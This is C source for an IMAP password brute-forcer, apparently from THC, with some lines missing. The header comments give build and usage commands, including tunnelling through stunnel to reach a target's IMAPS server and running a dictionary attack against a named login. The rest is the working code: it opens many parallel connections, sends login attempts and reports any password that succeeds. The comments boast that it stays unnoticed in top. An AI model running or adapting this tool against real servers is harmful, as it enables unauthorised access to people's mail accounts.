2 * IMAP bruter. Coded this in a hurry. hydra was too slow (and sucked 100% cpu).
3 * I had this one running with 30 passwords / second (100 parallel connections)
4 * against a single server and it did not even appear in top.
6 * Visit us -- your enemies already did.
7 * http://www.thc.org - THE HACKERS CHOICE
9 * gcc -Wall -O2 -g -o imap_bruter imap_bruter.c
11 * SSL support for dummies:
12 * stunnel -c -d 127.0.0.1:9993 -f -r imap.theirdomain.com:993
14 * Example: (Brute 40 in parallel)
15 * ./imap_bruter -r 1.2.3.4 -l carol -n 60 <dictionary.txt
18 #include <sys/types.h>
19 #include <sys/socket.h>
20 #include <netinet/in.h>
21 #include <arpa/inet.h>
41 #define FL_CONNECTED (0x01)
42 #define FL_HEADERREAD (0x02)
44 #define ERREXIT(a...) do { \
45 fprintf(stderr, "%s:%d ", __func__, __LINE__); \
51 #define FL_FINISHED (0x04) /* wordlist finished */
52 static unsigned short g_port;
53 static unsigned int g_ip;
55 static unsigned int g_parallel;
57 static fd_set g_rfds, g_wfds;
58 static unsigned int cracks;
59 static char *g_passwd;
62 struct peer_str peers[1024];
70 if ( (ip = inet_addr(host)) != -1)
72 if ( (he = gethostbyname(host)) == NULL)
75 if (he->h_length != 4)
77 return *(int *)he->h_addr;
80 int tcp_socket_connect(unsigned int ip, unsigned short port)
83 struct sockaddr_in addr;
86 if ((fd = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0)
89 memset(&addr, 0, sizeof addr);
90 addr.sin_family = PF_INET;
91 addr.sin_addr.s_addr = ip;
94 if (connect(fd, (struct sockaddr *)&addr, sizeof addr) != 0)
100 setsockopt(fd, SOL_SOCKET, SO_KEEPALIVE, &i, sizeof i);
101 fcntl(fd, F_SETFL, fcntl(fd, F_GETFL, 0) | O_NONBLOCK);
110 "imap-bruter [rlpn]\n"
112 " -r <ip address> - Server imapd runs on. [default: 127.0.0.1]\n"
113 " -p <port> - Port imapd runs on. [default: 143]\n"
114 " -l <login name> - Login name\n"
115 " -n <parallel> - Number of parallel connections.\n"
116 "Passwords are read from stdin. Stunnel can be used if IMAPS is in place.\n"
122 do_getopt(int argc, char *argv[])
129 while ((c = getopt(argc, argv, "r:l:p:n:")) != -1)
134 g_ip = hostname(optarg);
137 g_login = strdup(optarg);
140 g_port = atoi(optarg);
143 g_parallel = atoi(optarg);
153 fprintf(stderr, "Unknown host!\n");
163 peer_clear(struct peer_str *p)
170 /* Keep 'password' as it has not yet been processed */
175 do_readpwd(struct peer_str *p)
179 if (g_flags & FL_FINISHED)
182 memset(p->password, 0, sizeof p->password);
183 if (fgets(p->password, sizeof p->password - 1, stdin) == NULL)
186 g_passwd = p->password;
187 ptr = strchr(p->password, '\n');
195 * Socket ready for reading. Read line.
198 do_read(struct peer_str *p)
204 n = read(p->sox, p->buf + p->read, sizeof p->buf - p->read - 1);
209 if (p->read + 1 >= sizeof p->buf)
211 p->buf[p->read] = '\0';
212 ptr = strchr(p->buf, '\n');
216 if (p->flags & FL_HEADERREAD)
218 if (strstr(p->buf, " NO") == NULL)
220 printf("FOUND '%s'\n", p->password);
223 if (do_readpwd(p) != 0)
225 g_flags |= FL_FINISHED;
229 p->flags |= FL_HEADERREAD;
230 if (p->password[0] == '\0')
232 if (do_readpwd(p) != 0)
234 g_flags |= FL_FINISHED;
240 snprintf(buf, sizeof buf, "1 login \"%.100s\" \"%.100s\"\r\n", g_login, p->password);
242 if (write(p->sox, buf, n) != n)
244 /* Write should not fail. Linux kernel always has 1024 write
256 peer_init(struct peer_str *p)
263 main(int argc, char *argv[])
272 time_t time_last, time_start;
273 unsigned int hours, min, sec;
274 unsigned int old_cracks = 0;
277 g_passwd = "<waiting...>";
278 do_getopt(argc, argv);
279 time_now = time(NULL);
280 time_start = time_now;
281 time_last = time_now;
282 printf("Bruting '%s' with %d in parallel\n", g_login, g_parallel);
283 for (i = 0; i < g_parallel; i++)
284 peer_init(&peers[i]);
294 for (i = 0; i < g_parallel; i++)
296 if (peers[i].sox >= 0)
298 if (peers[i].flags & FL_CONNECTED)
299 FD_SET(peers[i].sox, &g_rfds);
301 FD_SET(peers[i].sox, &g_wfds);
302 } else if ((conn < 5) && (!(g_flags & FL_FINISHED))) {
303 peers[i].time = time_now;
304 peers[i].sox = tcp_socket_connect(g_ip, htons(g_port));
305 if (peers[i].sox >= 0)
306 FD_SET(peers[i].sox, &g_wfds);
309 if (peers[i].sox > maxfd)
310 maxfd = peers[i].sox;
314 fprintf(stderr, "Finished %u cracks after %lu sec.\n", cracks, time_now - time_start);
317 n = select(maxfd + 1, &g_rfds, &g_wfds, NULL, &tv);
318 time_now = time(NULL);
319 if ((time_last < time_now) && (old_cracks != cracks))
321 sec = time_now - time_start;
323 min = (sec - hours * 3600) / 60;
325 cs = ((float)cracks) / ((float)(time_now - time_start));
326 fprintf(stderr, "[%u:%02u:%02u] total: %d with %d peers: '%s' (%1.03f c/s)\n", hours, min, sec, cracks, n_peers, g_passwd, cs);
327 time_last = time_now;
331 for (i = 0; i < g_parallel; i++)
337 if (p->time + 30 < time_now)
339 fprintf(stderr, "TIMEOUT on socket...\n");
344 if (FD_ISSET(p->sox, &g_wfds))
348 if ((getsockopt(p->sox, SOL_SOCKET, SO_ERROR, &ret, &len) != 0) || (ret != 0))
351 p->flags |= FL_CONNECTED;
355 } else if (FD_ISSET(p->sox, &g_rfds)) {
358 } /* for through all peers.. */